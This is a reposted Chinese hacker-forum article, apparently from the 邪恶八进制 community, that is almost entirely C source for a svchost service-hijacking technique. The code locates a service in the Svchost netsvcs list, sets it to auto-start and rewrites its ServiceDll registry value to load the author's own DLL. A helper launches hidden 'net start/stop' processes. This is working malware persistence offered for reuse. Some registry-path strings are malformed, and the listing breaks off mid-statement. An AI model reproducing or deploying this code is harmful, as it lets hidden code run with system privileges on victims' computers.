
SVCHOST启动技术(一)
2014-11-23 20:10:54 来源: 作者: 【 】 浏览:82
Tags:SVCHOST 启动 技术

信息来源:邪恶八进制 文章作者:dream2fly.net

//说明:大部分代码来自bingle的文章,感谢bingle,并加入装载自启动代码
//感谢使用,欢迎光临白帽子实验室http://www.dream2fly.net/forum
Code Language : C


// Module-wide service bookkeeping. Per the original author's comment these
// two globals are used to obtain the service state; the code that registers
// the handle and updates the state is not part of this listing.
SERVICE_STATUS_HANDLE hSrv;      // status handle for this service
DWORD                 dwCurrState; // last service state recorded by the module

// Reports the service state to the Service Control Manager (SCM).
// Only the prototype is visible here; the meaning of the return value is
// not shown in this listing -- TODO confirm against the definition.
int TellSCM(DWORD dwState, DWORD dwExitCode, DWORD dwProgress);

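// Starts or stops the service named in stServiceCfg.szSvcName by launching
// "net start <name>" or "net stop <name>" as a hidden child process.
//
// dwCommand: SERVICE_CONTROL_CONTINUE selects "net start",
//            SERVICE_CONTROL_STOP selects "net stop"; any other value is
//            ignored (the original went on to run the bare service name as
//            a command line in that case).
// Returns:   always 0, as in the original; success or failure is only
//            reported through OutputString.
//
// NOTE(review): lpApplicationName is NULL and the command line begins with
// the unqualified word "net", so the executable is found through the
// CreateProcess search order rather than by a fixed path under the system
// directory. The service name is also appended unquoted, so a name with
// spaces would be split into separate arguments.
// NOTE(review): for defenders, this call is visible as a process-creation
// event for "net start/stop <service>" whose parent is the process hosting
// this DLL (svchost.exe, if the DLL is loaded the way the page title
// describes -- not shown in this listing).
int ControlService(DWORD dwCommand)
{
    const char *pszVerb;
    if (dwCommand == SERVICE_CONTROL_CONTINUE)
    {
        pszVerb = "net start ";
    }
    else if (dwCommand == SERVICE_CONTROL_STOP)
    {
        pszVerb = "net stop ";
    }
    else
    {
        // Unknown control code: nothing to run.
        return 0;
    }

    // Bound the concatenation; the original used strcpy/strcat with no
    // length check against the MAX_PATH buffer.
    char cmd[MAX_PATH] = {0};
    if (strlen(pszVerb) + strlen(stServiceCfg.szSvcName) >= sizeof cmd)
    {
        OutputString("SvcHostDLL: service name too long for command line");
        return 0;
    }
    strcpy(cmd, pszVerb);
    strcat(cmd, stServiceCfg.szSvcName);

    PROCESS_INFORMATION pi;
    STARTUPINFO si;
    memset(&pi, 0, sizeof(pi));
    memset(&si, 0, sizeof(si));
    si.cb = sizeof(si); // required by CreateProcess; the original left it 0
    // hStdInput/hStdOutput/hStdError stay zero from the memset, so the child
    // receives no redirected standard handles -- presumably intended to keep
    // it silent; confirm.
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;

    if (!CreateProcess(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
    {
        OutputString("SvcHostDLL: CreateProcess(%s) error:%d", cmd, GetLastError());
        return 0;
    }

    OutputString("SvcHostDLL: CreateProcess(%s) to %d", cmd, pi.dwProcessId);

    // The child is not waited on; release both handles so they do not leak
    // on every control request.
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);

    return 0;
}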

int ReplaceService()
{
int rc = 0;
HKEY hKey = 0;

try{
char buff[500];

//query svchost setting
char *ptr, *pSvchost = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost";
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, pSvchost, 0, KEY_QUERY_VALUE, &hKey);
if(ERROR_SUCCESS != rc)
{
OutputString("RegOpenKeyEx(%s) KEY_QUERY_VALUE error %d.", pSvchost, rc);
throw "";
}

DWORD type, size = sizeof buff;
rc = RegQueryValueEx(hKey, "netsvcs", 0, &type, (unsigned char*)buff, &size);
RegCloseKey(hKey);
SetLastError(rc);
if(ERROR_SUCCESS != rc)
throw "RegQueryValueEx(Svchost\netsvcs)";

for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
if(stricmp(ptr, stServiceCfg.szSvcName) == 0) break;

if(*ptr == 0)
{
OutputString("you specify service name not in Svchost\netsvcs, must be one of following:");
for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
OutputString(" - %s", ptr);
throw "";
}

//config service
strncpy(buff, "SYSTEM\CurrentControlSet\Services\", sizeof buff);
strcat(buff, stServiceCfg.szSvcName);
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
if(ERROR_SUCCESS != rc)
{
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
throw "";
}

DWORD dwValue = 2;//auto start
rc = RegSetValueEx(hKey, "Start", 0, REG_DWORD, (unsigned char*)&dwValue, sizeof(DWORD));
SetLastError(rc);
if(ERROR_SUCCESS != rc)
throw "RegSetValueEx(start)";

////////////////////
char szDllPath[MAX_PATH] = {0};
if(!GetModuleFileName(HMODULE(hDll), szDllPath, sizeof szDllPath))
throw "GetModuleFileName() get dll path";

LogToFile(szDllPath, GetLastError());

strcat(buff, "\Parameters");
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
if(ERROR_SUCCESS != rc)
{
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
throw "";
}
rc = RegSetValueEx(hKey, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)szDllPath, strlen(szDllPath)+1);
SetLastError(rc);
if(ERROR_SUCCESS != rc)
th
